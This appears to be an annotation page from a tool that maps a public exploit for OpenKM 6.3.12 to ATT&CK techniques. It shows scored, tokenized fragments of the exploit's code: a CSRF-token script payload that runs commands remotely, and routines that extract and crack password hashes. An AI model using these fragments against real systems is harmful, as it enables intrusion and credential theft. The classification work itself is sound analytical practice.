[webapps] OpenKM 6.3.12 - Multiple
ATT&CK techniques detected
T1190Exploit Public-Facing Application
79%
"process. getinputstream ( ) ) ) ; string output = reader. readline ( ) ; print ( " result : " + output ) ; } } catch ( ioexception e ) { { print ( " error : " + e. getmessage ( ) ) ; } } " " " script _ payload = { " csrft " : csrf _ token, " script " : exploit _ payload, " fspath…"
Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.
No matches for .
Loading techniques…
T1110.002Password Cracking
61%
"##es. txt file not found. please ensure the file exists in the current directory. " ) # combine usernames with cracked passwords def combine _ passwords ( ) : try : # load usernames and hashes from hashes. txt with open ( " hashes. txt ", " r " ) as file : hashes _ data = file. r…"
Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.
No matches for .
Loading techniques…
T1110.002Password Cracking
46%
") ) else : print _ colored ( " rce failed to return a result. ", " red " ) # function for crack hash def crack _ password ( ) : # extract hashes from hashes. txt and save to md5 _ hashes. txt def extract _ hashes _ to _ file ( ) : try : with open ( " hashes. txt ", " r " ) as fil…"
Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.
No matches for .
Loading techniques…
T1110.002Password Cracking
46%
"data into final _ cracked. txt final _ cracked = [ " username : passwords \ n " ] # add header for username, hash _ value in hashes _ dict. items ( ) : if hash _ value in cracked _ dict : password = cracked _ dict [ hash _ value ] final _ cracked. append ( f " { username } : { pa…"
Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.
No matches for .
Loading techniques…
Summary
OpenKM 6.3.12 - Multiple